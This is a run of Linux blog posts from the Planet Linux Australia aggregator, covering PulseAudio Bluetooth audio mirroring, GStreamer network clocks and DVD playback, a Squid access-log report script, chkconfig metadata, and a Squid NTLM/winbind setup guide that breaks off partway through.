This post is basically a love letter to the Pulseaudio and Gnome Bluetooth developers.

I upgraded my laptop to Ubuntu Karmic recently, which brought with it the ability to use my Bluetooth A2DP headphones natively. Getting them running is now as simple as using the Bluetooth icon in the panel to pair the laptop with the headphones, and then selecting them in the Sound Preferences applet, on the Output tab.

As soon as the headphones are connected, they show up as a new audio device. Selecting it instantly (and seamlessly) migrates my sounds and music from the laptop sound device onto the headphones. The Play/Pause, Next Track and Previous Track buttons all generate media key keypresses – so Rhythmbox and Totem behave like they’re supposed to. It’s lovely.

If that we’re all, it would already be pretty sweet in my opinion, but wait – there’s more!

A few days after starting to use my bluetooth headphones, my wife and I took a trip to Barcelona (from Dublin, where we live for the next few weeks… more on that later). When we got to the airport, the first thing we learned was that our flight had been delayed by 3 hours. Since I occasionally hack on multimedia related things, I typically have a few DVDs with me for testing. In this case, I had Vicky Cristina Barcelona on hand, and we hadn’t watched it yet – a perfect choice for 2 people on their way to Barcelona.

Problem! There are four sets of ears wanting to listen to the DVD, and only 2 audio channels produced. I could choose to send the sound to either the in built sound device, and listen on the earbuds my wife had, or I could send it to my bluetooth headphones, but not both.

Pulseaudio to the rescue! With a bit of command-line fu (no GUI for this, but that’s totally do-able), I created a virtual audio device, using Pulseaudio’s “combine” module. Like the name suggests, it combines multiple other audio devices into a single one. It can do more complex combinations (such as sending some channels hither and others thither), but I just needed a straight mirroring of the devices. In a terminal, I ran:

pactl load-module module-combine sink_name=shared_play adjust_time=3 slaves="alsa_output.pci-0000_00_1b.0.analog-stereo,bluez_sink.00_15_0F_72_70_E1"

Hey presto! Now there’s a third audio device available in the Sound Preferences to send the sound to, and it comes out both the wired ear buds and my bluetooth headphones (with a very slight sync offset, but close enough for my purposes).

Also, for those interested – the names of the 2 audio devices in my pactl command line came from the output of ‘pactl list’.

This kind of seamless migration of running audio streams really isn’t possible to do without something like Pulseaudio that can manage stream routing on the fly. I’m well aware that Pulseaudio integration into the distributions has been a bumpy ride for lots of people, but I think the end goal justifies the painful process of fixing all the sound drivers. I hope you do too!

Edit: Lennart points out that the extra paprefs application has an "Add virtual output device for simultaneous output on all local sound cards" check-box that does the same thing as loading the combine module manually, but also handles hot-plugging of devices as they appear and disappear.

Planet Linux AustraliaJan Schmidt: OSSbarcamp 2 – GNOME 3.0 talk

I gave a talk at the second Dublin OSSbarcamp yesterday. My goal was to provide some insight into the goals for GNOME 3.0 for people who didn’t attend GCDS.

Actually, the credit for the entire talk goes to Vincent and friends, who gave the GNOME 3.0 overview during the GUADEC opening at GCDS and to Owen for his GNOME Shell talk. I stole content from their slides shamelessly.

The slides are available in ODP form, or as a PDF

Planet Linux AustraliaJan Schmidt: New gst-rpicamsrc features

I’ve pushed some new changes to my Raspberry Pi camera GStreamer wrapper, at https://github.com/thaytan/gst-rpicamsrc/

These bring the GStreamer element up to date with new features added to raspivid since I first started the project, such as adding text annotations to the video, support for the 2nd camera on the compute module, intra-refresh and others.

Where possible, you can now dynamically update any of the properties – where the firmware supports it. So you can implement digital zoom by adjusting the region-of-interest (roi) properties on the fly, or update the annotation or change video effects and colour balance, for example.

The timestamps produced are now based on the internal STC of the Raspberry Pi, so the audio video sync is tighter. Although it was never terrible, it’s now more correct and slightly less jittery.

The one major feature I haven’t enabled as yet is stereoscopic handling. Stereoscopic capture requires 2 cameras attached to a Raspberry Pi Compute Module, so at the moment I have no way to test it works.

I’m also working on GStreamer stereoscopic handling in general (which is coming along). I look forward to releasing some of that code soon.

 

Planet Linux AustraliaJan Schmidt: Network clock examples

Way back in 2006, Andy Wingo wrote some small scripts for GStreamer 0.10 to demonstrate what was (back then) a fairly new feature in GStreamer – the ability to share a clock across the network and use it to synchronise playback of content across different machines.

Since GStreamer 1.x has been out for over 2 years, and we get a lot of questions about how to use the network clock functionality, it’s a good time for an update. I’ve ported the simple examples for API changes and to use the gobject-introspection based Python bindings and put them up on my server.

To give it a try, fetch play-master.py and play-slave.py onto 2 or more computers with GStreamer 1 installed. You need a media file accessible via some URI to all machines, so they have something to play.

Then, on one machine run play-master.py, passing a URI for it to play and a port to publish the clock on:

./play-master.py http://server/path/to/file 8554

The script will print out a command line like so:

Start slave as: python ./play-slave.py http://server/path/to/file [IP] 8554 1071152650838999

On another machine(s), run the printed command, substituting the IP address of the machine running the master script.

After a moment or two, the slaved machine should start playing the file in synch with the master:

Network Synchronised Playback

If they’re not in sync, check that you have the port you chose open for UDP traffic so the clock synchronisation packets can be transferred.

This basic technique is the core of my Aurena home media player system, which builds on top of the network clock mechanism to provide file serving and a simple shuffle playlist.

For anyone still interested in GStreamer 0.10 – Andy’s old scripts can be found on his server: play-master.py and play-slave.py

Planet Linux AustraliaJan Schmidt: 2014 GStreamer Conference

I’ve been home from Europe for over a week, after heading to Germany for the annual GStreamer conference and Linuxcon Europe.

We had a really great turnout for the GStreamer conference this year

[Photo: GStreamer Conference 2014]

as well as an amazing schedule of talks. All the talks were recorded by Ubicast, who got all the videos edited and uploaded in record time. The whole conference is available for viewing at http://gstconf.ubicast.tv/channels/#gstreamer-conference-2014

I gave one of the last talks of the schedule – about my current work adding support for describing and handling stereoscopic (3D) video. That support should land upstream sometime in the next month or two, so more on that in a bit.


There were too many great talks to mention them individually, but I was excited by 3 strong themes across the talks:

  • WebRTC/HTML5/Web Streaming support
  • Improving performance and reducing resource usage
  • Building better development and debugging tools

I’m looking forward to us collectively making progress on all those things and more in the upcoming year.

Planet Linux AustraliaJan Schmidt: Mysterious Parcel

I received a package in the mail today!
Mysterious Package

Everything arrived all nicely packaged up in a hobby box and ready for assembly.
Opening the box

Lots of really interesting goodies in the box!
Out on the table

After a little while, I’ve got the first part together.First part assembled

The rest will have to wait for another day. In the meantime, have fun guessing what it is, and enjoy this picture of a cake I baked on the weekend:
Strawberry Sponge Cake

See you later!

Planet Linux AustraliaJan Schmidt: DVD playback in GStreamer 1.0

Some time in 2012, the GStreamer team was busy working toward the GStreamer 1.0 major release. Along the way, I did my part and ported the DVD playback components from 0.10. DVD is a pretty complex playback scenario (let’s not talk about Blu-ray).

I gave a talk about it at the GStreamer conference way back in 2010 – video here. Apart from the content of that talk, the thing I liked most was that I used Totem as my presentation tool :)

With all the nice changes that GStreamer 1.0 brought, DVD playback worked better than ever. I was able to delete a bunch of hacks and workarounds from the 0.10 days. There have been some bugs, but mostly minor things. Recently though, I became aware of a whole class of DVDs that didn’t work for a very silly reason. The symptom was that particular discs would error out at the start with a cryptic “The stream is in the wrong format” message.

It turns out that these are DVDs that begin with a piece of video that has no sound.

Sometimes, that’s implemented on a disc as a video track with accompanying silence, but in the case that was broken the DVDs have no audio track for that initial section at all. For a normal file, GStreamer would handle that by not creating any audio decoder chain or audio sink output element and just decode and play video. For DVD though, there are very few discs that are entirely without audio – so we’re going to need the audio decoder chain sooner or later. There’s no point creating and destroying when the audio track appears and disappears.

Accordingly, we create an audio output pad, and GStreamer plugs in a suitable audio output sink, and then nothing happens because the pipeline can’t get to the Playing state – the pipeline is stuck in the Paused state. Before a pipeline can start playing, it has to progress through Ready and Paused and then to Playing state. The key to getting from Paused to Playing is that each output element (video sink and audio sink) in our case, has to receive some data and be ready to output it. A process called Pre-roll. Pre-rolling the pipeline avoids stuttering at the start, because otherwise the decoders would have to race to try and deliver something in time for it to get on screen.

With no audio track, there’s no actual audio packets to deliver, and the audio sink can’t Pre-roll. The solution in GStreamer 1.0 is a GAP event, sent to indicate that there is a space in the data, and elements should do whatever they need to to skip or fill it. In the audio sink’s case it should handle it by considering itself Pre-rolled and allowing the pipeline to go to Playing, starting the ring buffer and the audio clock – from which the rest of the pipeline will be timed.

Everything up to that point was working OK – the sink received the GAP event… and then errored out. It expects to be told what format the audio samples it’s receiving are so it knows how to fill in the gap… when there’s no audio track and no audio data, it was never being told.

In the end, the fix was to make the dummy place-holder audio decoder choose an audio sample format if it gets a GAP event and hasn’t received any data yet – any format, it doesn’t really matter as long as it’s reasonable. It’ll be discarded and a new format selected and propagated when some audio data really is encountered later in playback.

That fix is #c24a12 – later fixed up a bit by thiagoss to add the ‘sensible’ part to format selection. The initial commit liked to choose a samplerate of 1Hz :)

If you have any further bugs in your GStreamer DVD playback, please let us know!

Planet Linux AustraliaJan Schmidt: Proof of life – A New Adventure!

Hi world! It’s been several years since I used this blog, and there’s been a lot of things happen to us since then. I don’t even live on the same continent as I did.

More on that in a future post. Today, I have an announcement to make – a new Open Source company! Together with fellow GStreamer hackers Tim-Philipp Müller and Sebastian Dröge, I have founded a new company: Centricular Ltd.

From 2007 until July, I was working at Oracle on Sun Ray thin client firmware. Oracle shut down the project in July, and my job along with it – opening up this excellent opportunity to try something I’ve wanted for a while and start a business, while getting back to Free Software full time.

Our website has more information about the Open Source technologies and services we plan to offer. This list is not complete and we will try to broaden it over time, so if you have anything interesting that is not listed there but you think we can help with, get in touch

As Centricular’s first official contribution to the software pool, here’s my Raspberry Pi Camera GStreamer module. It wraps code from Raspivid to allow direct capture from the official camera module and hardware encoding to H.264 in a GStreamer pipeline – without the shell pipe and fdsrc hack people have been using to date. Take a look at the README for more information.

Raspberry Pi Camera GStreamer element

Sebastian, Tim and I will be at the GStreamer Conference in Edinburgh next week.

Planet Linux AustraliaMichael Davies: Planet Linux Australia... rebooted

Recently Linux Australia needed to move its infrastructure to a different place, and so we took the opportunity to build a fresh new instance of the Planet Linux Australia blog aggregator.

It made me realise how crusty the old site had become, how many things I had planned to do which I had left undone, and how I hadn't applied simple concepts such as Infrastructure as Code which have become accepted best-practices in the time since I originally set this up.

Of course things have changed in this time.  People blog less now, so I've also taken the opportunity to remove what appear to be dead blogs from the aggregator.   If you have a blog of interest to the Linux Australia community, you can ask to be added via emailing planet at linux dot org dot au. All you need is a valid Atom or RSS feed.

The other thing is that the blog aggregator software we use hasn't seen an update since 2011. It started out as PlanetPlanet, then moved on to Venus, and so I've taken a fork to hopefully improve this some more when I find my round tuit. Fortunately I don't still need to run it under python 2.4 which is getting a little long in the tooth.

Finally, the config for Planet Linux Australia is up on github.  Just like the venus code itself, pull requests welcome.  Share and Enjoy :-)

Planet Linux AustraliaMatthew Oliver: I’m now an OpenStack developer.

Hello world,

It’s been a while since I have blogged on this site; I apologise for that. My previous position was a tad proprietary, so although I worked with Linux, what I was doing needs to be sanitised before I can post about it. I have a bunch of posts in the cooker from those days still awaiting sanitation. But I have some great news… I am now an OpenStack developer.

It’s been a busy year: I got married and moved over to the UK to work for an amazing company which needs no introduction, Rackspace. Over there I was working with Linux in a Support/DevOps style role, but I am back in Oz now with a new team at Rackspace: the Rackspace Cloud Builders. In this role I’ll be getting my development hat on and developing for upstream OpenStack again, and I am so excited about it.

Watch this space!!!

Matt

Planet Linux AustraliaMatthew Oliver: chkconfig-ify an exising init script.

If you are using a 3rd party application / package installer to install a service onto a system that uses chkconfig to manage its run-levels, or writing your own init script that is incompatible with chkconfig, you may find that when trying to add it you get the following error:

# chkconfig <service> on
service <service> does not support chkconfig

Then it needs to be converted to support chkconfig. Don’t worry, it isn’t a rewrite, it’s just a matter of adding some metadata to the init script.
Just edit the init script and add the following lines just below the shebang (#!/bin/bash or #!/bin/sh).

# chkconfig: 2345 95 05
# description:
# processname:

NOTE: The numbers on the chkconfig line mean:

That on runlevels 2,3,4 and 5, this subsystem will be activated with priority 95 (one of the lasts), and deactivated with priority 05 (one of the firsts).

The above quote comes from this post where I found this solution, so I am passing it on.

For those playing along at home, chkconfig is the Redhat/Centos/Fedora way of managing your run-levels.

Planet Linux AustraliaMatthew Oliver: Centos 4 / RHEL 4 Bind 9.7.3-8 RPMs.

In case anyone out there in internet land happens to have a BIND DNS server still running RHEL 4 or CentOS 4 and requires a version that has been backported from the CentOS 6.2 source, one that has the CVE-2012-1667 fix, you can download the RPMs I built from here.

NOTE: I’ve only just built them, so I haven’t tested them yet, but thought it would be better to share. Also, they aren’t x86_64; if you need those, let me know and I’ll build some.

Planet Linux AustraliaMatthew Oliver: Simple Squid access log reporting.

Squid is one of the biggest and most used proxies on the interwebs, and generating reports from the access logs is already a done deal: there are many commercial and OSS apps that support the squid log format. But I found myself in a situation where I wanted stats but didn’t want to install a web server on my proxy or use syslog to push my logs to a centralised server running such software, and also wasn’t in a position to go and buy one of those off-the-shelf, amazing, wiz-bang Squid reporting and graphing tools.

As a Linux geek I surfed the web to see what others have done. I came across a list provided by the Squid website. Following a couple of links, I came across an awk script called ‘proxy_stats.gawk’ written by Richard Huveneers.

I downloaded it and tried it out… unfortunately it didn’t work. Looking at the code (which he nicely commented) showed that he had it set up for access logs from version 1.* of squid. Now, the squid access log format from squid 2.6+ hasn’t changed too much from version 1.1: all they have really done is add a “content type” entry at the end of each line.

So, as a good Linux geek does, I upgraded the script. My changes include:

  • Support for squid 2.6+
  • Removed the use of deprecated switches that are no longer supported by the sort command.
  • Now that there is an actual content type “column”, used it to improve the ‘Object type’ report.
  • Added a users section, as this was an important report I required which was missing.
  • And in a further hacked version, an auto-generated size for the first “name” column.

Now, with the explanation out of the way, let me show it to you!

For those who are new to awk, this is how I’ve been running it:

zcat <access log file> | awk -f proxy_stats.gawk > <report-filename>

NOTE: I’ve been using it for some historical analysis, so I’m running it on old rotated files, which are compressed thus the zcat.

You can pass more than one file at a time and the order doesn’t matter, as each line of an access log contains the date in epoch time:

zcat `find /var/log/squid/ -name "access.log*"` |awk -f proxy_stats.gawk

The script produces an ASCII report (see the end of this blog entry for an example), which could be generated and emailed via cron. If you want it to look nice in an email client using HTML, I suggest wrapping it in <pre> tags:

<html>
<head><title>Report Title</title></head>
<body>
Report title
<pre>
... Report goes here ...
</pre>
</body>
</html>

For those experienced Linux sysadmins out there, using cron + ‘find -mtime’ would be a very simple way of having an automated daily, weekly or even monthly report.
But like I said earlier, I was working on historic data: hundreds of files in a single report, hundreds because for business reasons we have been rotating the squid logs every hour. So I did what I do best: write a quick bash script to find all the files I needed to cat into the report:

#!/bin/bash

ACCESS_LOG_DIR="/var/log/squid/access.log*"
MONTH="$1"

function getFirstLine() {
	if [ -n  "`echo $1 |grep "gz$"`" ]
	then
		zcat $1 |head -n 1
	else
		head -n 1 $1 
	fi
}

function getLastLine() {
	if [ -n  "`echo $1 |grep "gz$"`" ]
	then
		zcat $1 |tail -n 1
	else
		tail -n 1 $1 
	fi
}

for log in `ls $ACCESS_LOG_DIR`
do
	firstLine="`getFirstLine $log`"
	epochStr="`echo $firstLine |awk '{print $1}'`"
	month=`date -d @$epochStr +%m`
	
	if [ "$month" -eq "$MONTH" ]
	then
		echo $log
		continue
	fi

	
	#Check the last line
	lastLine="`getLastLine $log`"
	epochStr="`echo $lastLine |awk '{print $1}'`"
        month=`date -d @$epochStr +%m`

        if [ "$month" -eq "$MONTH" ]
        then
                echo $log
        fi
	
done

So there you go: thanks to the work of Richard Huveneers there is a script that I think generates a pretty good ASCII report, which can be automated or integrated easily into any Linux/Unix workflow.

If you’re interested in getting hold of the most up-to-date version of the script, you can get it from my sysadmin github repo here.

As promised earlier here is an example report:

Parsed lines  : 32960
Bad lines     : 0

First request : Mon 30 Jan 2012 12:06:43 EST
Last request  : Thu 09 Feb 2012 09:05:01 EST
Number of days: 9.9

Top 10 sites by xfers           reqs   %all %xfers   %hit         MB   %all   %hit     kB/xf      kB/s
------------------------- ------------------------------- ------------------------ -------------------
213.174.155.216                   20   0.1% 100.0%   0.0%        0.0   0.0%   0.0%       1.7       2.5
30.media.tumblr.com                1   0.0% 100.0%   0.0%        0.0   0.0%   0.0%      48.3      77.4
28.media.tumblr.com                1   0.0% 100.0%   0.0%        0.1   0.0%   0.0%      87.1       1.4
26.media.tumblr.com                1   0.0%   0.0%      -        0.0   0.0%      -         -         -
25.media.tumblr.com                2   0.0% 100.0%   0.0%        0.1   0.0%   0.0%      49.2      47.0
24.media.tumblr.com                1   0.0% 100.0%   0.0%        0.1   0.0%   0.0%     106.4     181.0
10.1.10.217                      198   0.6% 100.0%   0.0%       16.9   0.9%   0.0%      87.2    3332.8
3.s3.envato.com                   11   0.0% 100.0%   0.0%        0.1   0.0%   0.0%       7.6      18.3
2.s3.envato.com                   15   0.0% 100.0%   0.0%        0.1   0.0%   0.0%       7.5      27.1
2.media.dorkly.cvcdn.com           8   0.0% 100.0%  25.0%        3.2   0.2%   0.3%     414.1     120.5

Top 10 sites by MB              reqs   %all %xfers   %hit         MB   %all   %hit     kB/xf      kB/s
------------------------- ------------------------------- ------------------------ -------------------
zulu.tweetmeme.com                 2   0.0% 100.0% 100.0%        0.0   0.0% 100.0%       3.1     289.6
ubuntu.unix.com                    8   0.0% 100.0% 100.0%        0.1   0.0% 100.0%       7.5     320.0
static02.linkedin.com              1   0.0% 100.0% 100.0%        0.0   0.0% 100.0%      36.0     901.0
solaris.unix.com                   2   0.0% 100.0% 100.0%        0.0   0.0% 100.0%       3.8     223.6
platform.tumblr.com                2   0.0% 100.0% 100.0%        0.0   0.0% 100.0%       1.1     441.4
i.techrepublic.com.com             5   0.0%  60.0% 100.0%        0.0   0.0% 100.0%       6.8    2539.3
i4.zdnetstatic.com                 2   0.0% 100.0% 100.0%        0.0   0.0% 100.0%      15.3     886.4
i4.spstatic.com                    1   0.0% 100.0% 100.0%        0.0   0.0% 100.0%       4.7     520.2
i2.zdnetstatic.com                 2   0.0% 100.0% 100.0%        0.0   0.0% 100.0%       7.8    2920.9
i2.trstatic.com                    9   0.0% 100.0% 100.0%        0.0   0.0% 100.0%       1.5     794.5

Top 10 neighbor report          reqs   %all %xfers   %hit         MB   %all   %hit     kB/xf      kB/s
------------------------- ------------------------------- ------------------------ -------------------
www.viddler.com                    4   0.0% 100.0%   0.0%        0.0   0.0%      -       0.0       0.0
www.turktrust.com.tr              16   0.0% 100.0%   0.0%        0.0   0.0%      -       0.0       0.0
www.trendmicro.com                 5   0.0% 100.0%   0.0%        0.0   0.0%      -       0.0       0.0
www.reddit.com                     2   0.0% 100.0%   0.0%        0.0   0.0%      -       0.0       0.0
www.linkedin.com                   2   0.0% 100.0%   0.0%        0.0   0.0%      -       0.0       0.0
www.google-analytics.com           2   0.0% 100.0%   0.0%        0.0   0.0%      -       0.0       0.0
www.facebook.com                   2   0.0% 100.0%   0.0%        0.0   0.0%      -       0.0       0.0
www.dynamicdrive.com               1   0.0% 100.0%   0.0%        0.0   0.0%      -       0.0       0.0
www.benq.com.au                    1   0.0% 100.0%   0.0%        0.0   0.0%      -       0.0       0.0
wd-edge.sharethis.com              1   0.0% 100.0%   0.0%        0.0   0.0%      -       0.0       0.0

Local code                      reqs   %all %xfers   %hit         MB   %all   %hit     kB/xf      kB/s
------------------------- ------------------------------- ------------------------ -------------------
TCP_CLIENT_REFRESH_MISS         2160   6.6% 100.0%   0.0%        7.2   0.4%   0.0%       3.4      12.9
TCP_HIT                          256   0.8% 100.0%  83.2%       14.0   0.8% 100.0%      56.0    1289.3
TCP_IMS_HIT                      467   1.4% 100.0% 100.0%       16.9   0.9% 100.0%      37.2    1747.4
TCP_MEM_HIT                      426   1.3% 100.0% 100.0%       96.5   5.3% 100.0%     232.0    3680.9
TCP_MISS                       27745  84.2%  97.4%   0.0%     1561.7  85.7%   0.3%      59.2      18.2
TCP_REFRESH_FAIL                  16   0.0% 100.0%   0.0%        0.2   0.0%   0.0%      10.7       0.1
TCP_REFRESH_MODIFIED             477   1.4%  99.8%   0.0%       35.0   1.9%   0.0%      75.3    1399.4
TCP_REFRESH_UNMODIFIED          1413   4.3% 100.0%   0.0%       91.0   5.0%   0.0%      66.0     183.5

Status code                     reqs   %all %xfers   %hit         MB   %all   %hit     kB/xf      kB/s
------------------------- ------------------------------- ------------------------ -------------------
000                              620   1.9% 100.0%   0.0%        0.0   0.0%      -       0.0       0.0
200                            29409  89.2% 100.0%   2.9%     1709.7  93.8%   7.7%      59.5     137.1
204                              407   1.2% 100.0%   0.0%        0.2   0.0%   0.0%       0.4       1.4
206                              489   1.5% 100.0%   0.0%      112.1   6.1%   0.0%     234.7     193.0
301                               82   0.2% 100.0%   0.0%        0.1   0.0%   0.0%       0.7       1.5
302                              356   1.1% 100.0%   0.0%        0.3   0.0%   0.0%       0.8       2.7
303                                5   0.0% 100.0%   0.0%        0.0   0.0%   0.0%       0.7       1.5
304                              862   2.6% 100.0%  31.2%        0.4   0.0%  30.9%       0.4      34.2
400                                1   0.0%   0.0%      -        0.0   0.0%      -         -         -
401                                1   0.0%   0.0%      -        0.0   0.0%      -         -         -
403                               47   0.1%   0.0%      -        0.0   0.0%      -         -         -
404                              273   0.8%   0.0%      -        0.0   0.0%      -         -         -
500                                2   0.0%   0.0%      -        0.0   0.0%      -         -         -
502                               12   0.0%   0.0%      -        0.0   0.0%      -         -         -
503                               50   0.2%   0.0%      -        0.0   0.0%      -         -         -
504                              344   1.0%   0.0%      -        0.0   0.0%      -         -         -

Hierarchie code                 reqs   %all %xfers   %hit         MB   %all   %hit     kB/xf      kB/s
------------------------- ------------------------------- ------------------------ -------------------
DIRECT                         31843  96.6%  97.7%   0.0%     1691.0  92.8%   0.0%      55.7      44.3
NONE                            1117   3.4% 100.0% 100.0%      131.6   7.2% 100.0%     120.7    2488.2

Method report                   reqs   %all %xfers   %hit         MB   %all   %hit     kB/xf      kB/s
------------------------- ------------------------------- ------------------------ -------------------
CONNECT                         5485  16.6%  99.2%   0.0%      132.8   7.3%   0.0%      25.0       0.3
GET                            23190  70.4%  97.7%   4.9%     1686.3  92.5%   7.8%      76.2     183.2
HEAD                            2130   6.5%  93.7%   0.0%        0.7   0.0%   0.0%       0.3       1.1
POST                            2155   6.5%  99.4%   0.0%        2.9   0.2%   0.0%       1.4       2.0

Object type report              reqs   %all %xfers   %hit         MB   %all   %hit     kB/xf      kB/s
------------------------- ------------------------------- ------------------------ -------------------
*/*                                1   0.0% 100.0%   0.0%        0.0   0.0%   0.0%       1.6       3.2
application/cache-digest         396   1.2% 100.0%  50.0%       33.7   1.8%  50.0%      87.1    3655.1
application/gzip                   1   0.0% 100.0%   0.0%        0.1   0.0%   0.0%      61.0      30.8
application/javascript           227   0.7% 100.0%  12.3%        2.2   0.1%   7.7%       9.9      91.9
application/json                 409   1.2% 100.0%   0.0%        1.6   0.1%   0.0%       4.1       6.0
application/ocsp-response        105   0.3% 100.0%   0.0%        0.2   0.0%   0.0%       1.9       2.0
application/octet-stream         353   1.1% 100.0%   6.8%       81.4   4.5%   9.3%     236.1     406.9
application/pdf                    5   0.0% 100.0%   0.0%       13.5   0.7%   0.0%    2763.3      75.9
application/pkix-crl              96   0.3% 100.0%  13.5%        1.0   0.1%   1.7%      10.6       7.0
application/vnd.google.sa       1146   3.5% 100.0%   0.0%        1.3   0.1%   0.0%       1.1       2.4
application/vnd.google.sa       4733  14.4% 100.0%   0.0%       18.8   1.0%   0.0%       4.1      13.4
application/x-bzip2               19   0.1% 100.0%   0.0%       78.5   4.3%   0.0%    4232.9     225.5
application/x-gzip               316   1.0% 100.0%  59.8%      133.4   7.3%  59.3%     432.4    3398.1
application/x-javascript        1036   3.1% 100.0%   5.8%        9.8   0.5%   3.4%       9.7      52.1
application/xml                   46   0.1% 100.0%  34.8%        0.2   0.0%  35.1%       3.5     219.7
application/x-msdos-progr        187   0.6% 100.0%   0.0%       24.4   1.3%   0.0%     133.7     149.6
application/x-pkcs7-crl           83   0.3% 100.0%   7.2%        1.6   0.1%   0.4%      19.8      10.8
application/x-redhat-pack         13   0.0% 100.0%   0.0%       57.6   3.2%   0.0%    4540.7     156.7
application/x-rpm                507   1.5% 100.0%   6.3%      545.7  29.9%   1.5%    1102.2     842.8
application/x-sdlc                 1   0.0% 100.0%   0.0%        0.9   0.0%   0.0%     888.3     135.9
application/x-shockwave-f        109   0.3% 100.0%  11.9%        5.4   0.3%  44.5%      50.6     524.1
application/x-tar                  9   0.0% 100.0%   0.0%        1.5   0.1%   0.0%     165.3      36.4
application/x-www-form-ur         11   0.0% 100.0%   0.0%        0.1   0.0%   0.0%       9.9      15.4
application/x-xpinstall            2   0.0% 100.0%   0.0%        2.5   0.1%   0.0%    1300.6     174.7
application/zip                 1802   5.5% 100.0%   0.0%      104.0   5.7%   0.0%      59.1       2.5
Archive                           89   0.3% 100.0%   0.0%        0.0   0.0%      -       0.0       0.0
audio/mpeg                         2   0.0% 100.0%   0.0%        5.8   0.3%   0.0%    2958.2      49.3
binary/octet-stream                2   0.0% 100.0%   0.0%        0.0   0.0%   0.0%       5.5      14.7
font/ttf                           2   0.0% 100.0%   0.0%        0.0   0.0%   0.0%      15.5      12.5
font/woff                          1   0.0% 100.0% 100.0%        0.0   0.0% 100.0%      42.5    3539.6
Graphics                         126   0.4% 100.0%   0.0%        0.1   0.0%   0.0%       0.6       2.5
HTML                              14   0.0% 100.0%   0.0%        0.0   0.0%   0.0%       0.1       0.1
image/bmp                          1   0.0% 100.0%   0.0%        0.0   0.0%   0.0%       1.3       3.9
image/gif                       5095  15.5% 100.0%   2.4%       35.9   2.0%   0.7%       7.2       9.5
image/jpeg                      1984   6.0% 100.0%   4.3%       52.4   2.9%   0.6%      27.0      62.9
image/png                       1684   5.1% 100.0%  10.3%       28.6   1.6%   1.9%      17.4     122.2
image/vnd.microsoft.icon          10   0.0% 100.0%  30.0%        0.0   0.0%  12.8%       1.0       3.3
image/x-icon                      72   0.2% 100.0%  16.7%        0.2   0.0%   6.0%       3.2      15.0
multipart/bag                      6   0.0% 100.0%   0.0%        0.1   0.0%   0.0%      25.2      32.9
multipart/byteranges              93   0.3% 100.0%   0.0%       16.5   0.9%   0.0%     182.0     178.4
text/cache-manifest                1   0.0% 100.0%   0.0%        0.0   0.0%   0.0%       0.7       3.1
text/css                         470   1.4% 100.0%   7.9%        3.4   0.2%   5.8%       7.4      59.7
text/html                       2308   7.0%  70.7%   0.4%        9.6   0.5%   0.6%       6.0      14.7
text/javascript                 1243   3.8% 100.0%   2.7%       11.1   0.6%   5.2%       9.1      43.3
text/json                          1   0.0% 100.0%   0.0%        0.0   0.0%   0.0%       0.5       0.7
text/plain                      1445   4.4%  99.4%   1.5%       68.8   3.8%   5.5%      49.0      41.9
text/x-cross-domain-polic         24   0.1% 100.0%   0.0%        0.0   0.0%   0.0%       0.7       1.7
text/x-js                          2   0.0% 100.0%   0.0%        0.0   0.0%   0.0%      10.1       6.4
text/x-json                        9   0.0% 100.0%   0.0%        0.0   0.0%   0.0%       3.0       8.5
text/xml                         309   0.9% 100.0%  12.9%       12.9   0.7%  87.5%      42.8     672.3
unknown/unknown                 6230  18.9%  99.3%   0.0%      132.9   7.3%   0.0%      22.0       0.4
video/mp4                          5   0.0% 100.0%   0.0%        3.2   0.2%   0.0%     660.8      62.7
video/x-flv                      117   0.4% 100.0%   0.0%      321.6  17.6%   0.0%    2814.9     308.3
video/x-ms-asf                     2   0.0% 100.0%   0.0%        0.0   0.0%   0.0%       1.1       4.7

Ident (User) Report             reqs   %all %xfers   %hit         MB   %all   %hit     kB/xf      kB/s
------------------------- ------------------------------- ------------------------ -------------------
-                              32960 100.0%  97.8%   3.5%     1822.6 100.0%   7.2%      57.9     129.0

Weekly report                   reqs   %all %xfers   %hit         MB   %all   %hit     kB/xf      kB/s
------------------------- ------------------------------- ------------------------ -------------------
2012/01/26                     14963  45.4%  97.6%   3.6%      959.8  52.7%   1.8%      67.3     104.5
2012/02/02                     17997  54.6%  98.0%   3.4%      862.8  47.3%  13.2%      50.1     149.4

Total report                    reqs   %all %xfers   %hit         MB   %all   %hit     kB/xf      kB/s
------------------------- ------------------------------- ------------------------ -------------------
All requests                   32960 100.0%  97.8%   3.5%     1822.6 100.0%   7.2%      57.9     129.0

Produced by : Mollie's hacked access-flow 0.5
Running time: 2 seconds

Happy squid reporting!

Planet Linux AustraliaMatthew Oliver: Identically partition disks.. the easy way!

I was just looking into a software RAID howto… for no reason really, but I’m kinda glad I did! When you set up software RAID you want to make sure all disks are partitioned the same, right? So check this out:

3. Create partitions on /dev/sda identical to the partitions on /dev/sdb:

sfdisk -d /dev/sdb | sfdisk /dev/sda

That’s a much easier way ;)
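
On the same note, the sfdisk dump is plain text, so it also makes a handy backup of the partition table (the filename is just an example):

# Save the layout of /dev/sdb, then apply it to /dev/sda later if needed
sfdisk -d /dev/sdb > sdb-partition-table.txt
sfdisk /dev/sda < sdb-partition-table.txt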

This gem is thanks to: http://www.howtoforge.com/how-to-create-a-raid1-setup-on-an-existing-centos-redhat-6.0-system

Planet Linux AustraliaMatthew Oliver: NTLM Authentication in Squid using Winbind.

Some old Windows servers require authentication through the old NTLM protocol; luckily, with help from Squid, Samba and winbind, we can do this under Linux.

Some URLs that much of this information was gathered from are:

  • http://wiki.squid-cache.org/ConfigExamples/Authenticate/NtlmCentOS5
  • http://wiki.squid-cache.org/ConfigExamples/Authenticate/Ntlm

HOW TO

In order to authenticate through winbind, we will be using it together with Samba to connect to a Windows domain, so you will need to have a domain and the details for it, or all this will be for naught. I’ll use some fake credentials for this post.

Required Packages
Let’s install all the required packages:

yum install squid krb5-workstation samba-common ntp samba-winbind authconfig

NTP (Network Time Protocol)
Kerberos and winbind can be a little finicky about date and time, so it’s a good idea to use NTP for your network. I’ll assume your domain controller (DC) will also be your NTP server, in which case let’s set it up.

Comment out any lines that begin with server and create only one that points to your Active Directory PDC.

# vim /etc/ntp.conf
server pdc.test.lan

Now add it to the default runlevels and start it.

chkconfig ntpd on
/etc/init.d/ntpd start

Samba, Winbind and Kerberos
We will use the authconfig package/command we installed earlier to configure Samba and Winbind and perform the domain join in one step; this makes things _SO_ much easier!!!

NOTE: If you don’t have DNS set up then you will need to add the DC to your hosts file, and it is important to use the name the DC machine knows itself as in AD.
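
For example, an entry like this in /etc/hosts would do (the address here is made up):

# /etc/hosts - only needed if DNS can't resolve the DC
192.168.1.10    pdc.test.lan    pdc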


authconfig --enableshadow --enablemd5 --passalgo=md5 --krb5kdc=pdc.test.lan \
